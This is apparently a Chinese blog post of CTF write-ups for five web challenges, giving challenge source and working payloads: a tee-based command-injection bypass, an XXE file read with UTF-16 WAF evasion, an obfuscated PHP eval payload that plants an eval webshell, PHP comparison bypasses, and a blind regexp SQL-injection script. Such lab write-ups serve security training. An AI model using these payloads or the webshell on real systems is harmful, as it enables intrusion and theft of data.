NSSCTF练习2

Posted on | In

前言

继续刷NSSCTF,web的内容还是很杂的,多刷题还是能学到很多东西的。

finalrce

审计代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
}

这题也是过滤比较狠的rce,而且使用的是exec(),这个函数是没有回显的,按平常来说可以反弹shell,但这里的过滤太狠了,几乎堵死这条路了。因此我们要学习一个特殊的linux命令:tee

  • tee:将想要执行的命令写进文件中,当访问这个文件后执行命令

因此我们构建这样的payload:

1
dir /|tee mrl64

接着我们访问/mrl64,就可以读取到根目录了,cat被过滤了,解决方法还是很多的,之前写到的无字符webshell就可以利用,也可以使用引号进行绕过,也可以用sort代替,等等,这里给出一种payload:

1
?url=sort /flllll''aaaaaaggggggg|tee mrl64

[CSAWQual 2019]Unagi

一进网页先到处翻翻,发现提示:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<users>
  <user>
    <username>alice</username>
	<password>passwd1</password>
	<name>Alice</name>
	<email>alice@fakesite.com</email>
	<group>CSAW2019</group>
  </user>
  <user>
	<username>bob</username>
	<password>passwd2</password>
	<name> Bob</name>
	<email>bob@fakesite.com</email>
	<group>CSAW2019</group>
  </user>
</users>

明显的xee,结合提示flag在/flag下,我们直接构造payload:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?xml version="1.0"?>
<!DOCTYPE users[
<!ENTITY payload SYSTEM "file:///flag" >]>
<users>
  <user>
	<username>bob</username>
	<password>passwd2</password>
	<name> Bob</name>
	<email>bob@fakesite.com</email>
	<group>CSAW2019</group>
	<intro>&payload;</intro>
  </user>
</users>

上传1.xml,结果发现有waf,尝试用utf-16编码:

1
iconv -f utf8 -t utf16 1.xml>2.xml

再次上传即可获取flag。

hardrce_3

审计源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
 <?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\^','\~','\|'];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm)) {
        die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");
    }}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{
    die("Ra'sAlGhul说用字母数字是没有灵魂的!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>

这题把取反和异或全给禁了,我们采用自增的方式构建payload,记得url编码:

1
http://1.14.71.254:28041/?wllm=%24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B%27%21%27%3D%3D%27%40%27%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D%27_%27%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___%28%24_%5B_%5D%29%3B

这样我们就写入了一个webshell,查看phpinfo,发现一些系统函数被禁用,因此我们直接上传一个一句话:

1
_=file_put_contents('1.php','<?php @eval($_POST['mrl64']);?>');

蚁剑连接即可。

[鹤城杯 2021]Middle magic

审计源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
 <?php
highlight_file(__FILE__);
include "./flag.php";
include "./result.php";
if(isset($_GET['aaa']) && strlen($_GET['aaa']) < 20){

    $aaa = preg_replace('/^(.*)level(.*)$/', '${1}<!-- filtered -->${2}', $_GET['aaa']);

    if(preg_match('/pass_the_level_1#/', $aaa)){
        echo "here is level 2";
        
        if (isset($_POST['admin']) and isset($_POST['root_pwd'])) {
            if ($_POST['admin'] == $_POST['root_pwd'])
                echo '<p>The level 2 can not pass!</p>';
        // START FORM PROCESSING    
            else if (sha1($_POST['admin']) === sha1($_POST['root_pwd'])){
                echo "here is level 3,do you kown how to overcome it?";
                if (isset($_POST['level_3'])) {
                    $level_3 = json_decode($_POST['level_3']);
                    
                    if ($level_3->result == $result) {
                        
                        echo "success:".$flag;
                    }
                    else {
                        echo "you never beat me!";
                    }
                }
                else{
                    echo "out";
                }
            }
            else{
                
                die("no");
            }
        // perform validations on the form data
        }
        else{
            echo '<p>out!</p>';
        }

    }
    
    else{
        echo 'nonono!';
    }

    echo '<hr>';
}

?>

第一关是传入aaa,要求内容为pass_the_level_1#,但是不能匹配到level,老考点了,这里用%0a截断。

接着是第二关,POSTadmin参数和root_pwd参数,要求两者值不等但是sha1的值要相等,也是老考点,数组就行。

最后一关,传入level_3参数,要求这个参数的内容经过json解码后的result的值能够等于$result。这个变量的值我们不知道,但不重要,result为0就可以了。

最终payload:

1
2
?aaa=%0apass_the_level_1%23
POST:admin[]=1&root_pwd[]=2&level_3={"result":0}

[NCTF 2019]SQLi

进入网页是一个登录框,同时还给了sql查询语句:

1
sqlquery : select * from users where username='' and passwd=''

尝试信息搜集,发现robots.txt,访问并发现hint.txt:

1
2
3
4
5
6
$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";


If $_POST['passwd'] === admin's password,

Then you will get the flag;

看得出来,这过滤太狠毒了,但是又提示我们只要得到密码就可以了,这让我们想起了hgame第三周的那题盲注。但是like被过滤了,因此我们使用regexp来进行匹配。

还有一点,如果直接从python传入%00会被转义,因此我们需要使用parse.unquote('%00')来避免这一情况。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests
import string
from urllib import parse

strs = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_"
url = "http://1.14.71.254:28053/index.php"

name = ''
for i in range(0, 100):
    for j in strs:
        z = name + j
        payload = "||passwd/**/regexp/**/\"^{}\";{}".format(z, parse.unquote('%00'))
        data = {
            "username": "\\",
            "passwd": payload
        }
        r = requests.post(url, data=data)

        if "welcome" in r.text:
            name += j
            print(name)
            break
print(name)

获得密码后登陆得到flag。